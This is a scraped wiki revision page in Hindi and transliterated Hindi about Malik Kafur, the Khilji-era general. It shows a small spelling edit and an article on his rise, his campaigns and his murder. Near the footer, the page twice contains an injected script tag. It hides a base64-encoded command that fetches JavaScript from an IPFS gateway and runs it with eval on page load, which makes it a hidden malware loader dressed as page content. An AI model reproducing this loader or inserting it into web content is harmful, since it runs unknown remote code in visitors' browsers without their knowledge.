Difference between revisions of "मलिक काफ़ूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्व" to "महत्त्व")
Line 5: Line 5:
 
*मलिक काफ़ूर ने सफलतापूर्वक ख़िलजी सेना का नेतृत्व करते हुए [[देवगिरि]], [[वारंगल आन्ध्र प्रदेश|वारंगल]], द्रारसमुद्र, मालाबार एवं [[मदुरा]] को जीत कर [[दिल्ली सल्तनत]] के अधीन कर दिया।
 
*मलिक काफ़ूर ने सफलतापूर्वक ख़िलजी सेना का नेतृत्व करते हुए [[देवगिरि]], [[वारंगल आन्ध्र प्रदेश|वारंगल]], द्रारसमुद्र, मालाबार एवं [[मदुरा]] को जीत कर [[दिल्ली सल्तनत]] के अधीन कर दिया।
 
*उसकी इस अभूतपूर्व सफलता से प्रभावित होकर अलाउद्दीन ख़िलजी ने उसे अपना सर्वाधिक विश्वस्त अधिकारी बना लिया।
 
*उसकी इस अभूतपूर्व सफलता से प्रभावित होकर अलाउद्दीन ख़िलजी ने उसे अपना सर्वाधिक विश्वस्त अधिकारी बना लिया।
*सत्ता एवं प्रभाव में वृद्धि के साथ-साथ मलिक काफ़ूर की महत्वाकांक्षाएँ भी बढ़ गयीं।
+
*सत्ता एवं प्रभाव में वृद्धि के साथ-साथ मलिक काफ़ूर की महत्त्वाकांक्षाएँ भी बढ़ गयीं।
 
*1316 ई. में अलाउद्दीन ख़िलजी की मृत्यु के बाद उसने सुल्तान के नाबालिग लड़के को सिंहासन पर बैठाकर राज्य की सम्पूर्ण शक्ति को अपने हाथ में केंद्रित कर लिया।
 
*1316 ई. में अलाउद्दीन ख़िलजी की मृत्यु के बाद उसने सुल्तान के नाबालिग लड़के को सिंहासन पर बैठाकर राज्य की सम्पूर्ण शक्ति को अपने हाथ में केंद्रित कर लिया।
 
*काफ़ूर ने स्वयं गद्दी हथियाने के मोह में फँसकर अलाउद्दीन ख़िलजी के दो पुत्रों की आँखें निकलवा कर नाबालिक सुल्तान की माँ को बन्दी बना लिया।
 
*काफ़ूर ने स्वयं गद्दी हथियाने के मोह में फँसकर अलाउद्दीन ख़िलजी के दो पुत्रों की आँखें निकलवा कर नाबालिक सुल्तान की माँ को बन्दी बना लिया।

Revision as of 10:39, 13 March 2011

  • malik kafoor moolatah hindoo jati ka ek hij da tha.
  • use ek hazar dinar mean kharida gaya tha, isalie malik kafoor ko ‘hazar dinari’ bhi kaha jata tha.
  • nusarat khaan ne use kharid kar 1298 ee. mean gujarat vijay se vapas jane par sultan alauddin khilaji ke samaksh tohaphe ke roop mean prastut kiya.
  • shighr hi vah sultan alauddin khilaji ka 'malik naib' bana diya gaya.
  • malik kafoor ne saphalatapoorvak khilaji sena ka netritv karate hue devagiri, varangal, drarasamudr, malabar evan madura ko jit kar dilli saltanat ke adhin kar diya.
  • usaki is abhootapoorv saphalata se prabhavit hokar alauddin khilaji ne use apana sarvadhik vishvast adhikari bana liya.
  • satta evan prabhav mean vriddhi ke sath-sath malik kafoor ki mahattvakaankshaean bhi badh gayian.
  • 1316 ee. mean alauddin khilaji ki mrityu ke bad usane sultan ke nabalig l dake ko sianhasan par baithakar rajy ki sampoorn shakti ko apane hath mean keandrit kar liya.
  • kafoor ne svayan gaddi hathiyane ke moh mean phansakar alauddin khilaji ke do putroan ki aankhean nikalava kar nabalik sultan ki maan ko bandi bana liya.
  • kafoor ke is kary se atyant hi krodh mean bhare hue alauddin khilaji ke vaphadaroan ne sangathit hokar kafoor ke sianhasan par baithane ke 35 din bad hi usaki hatya kar di.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>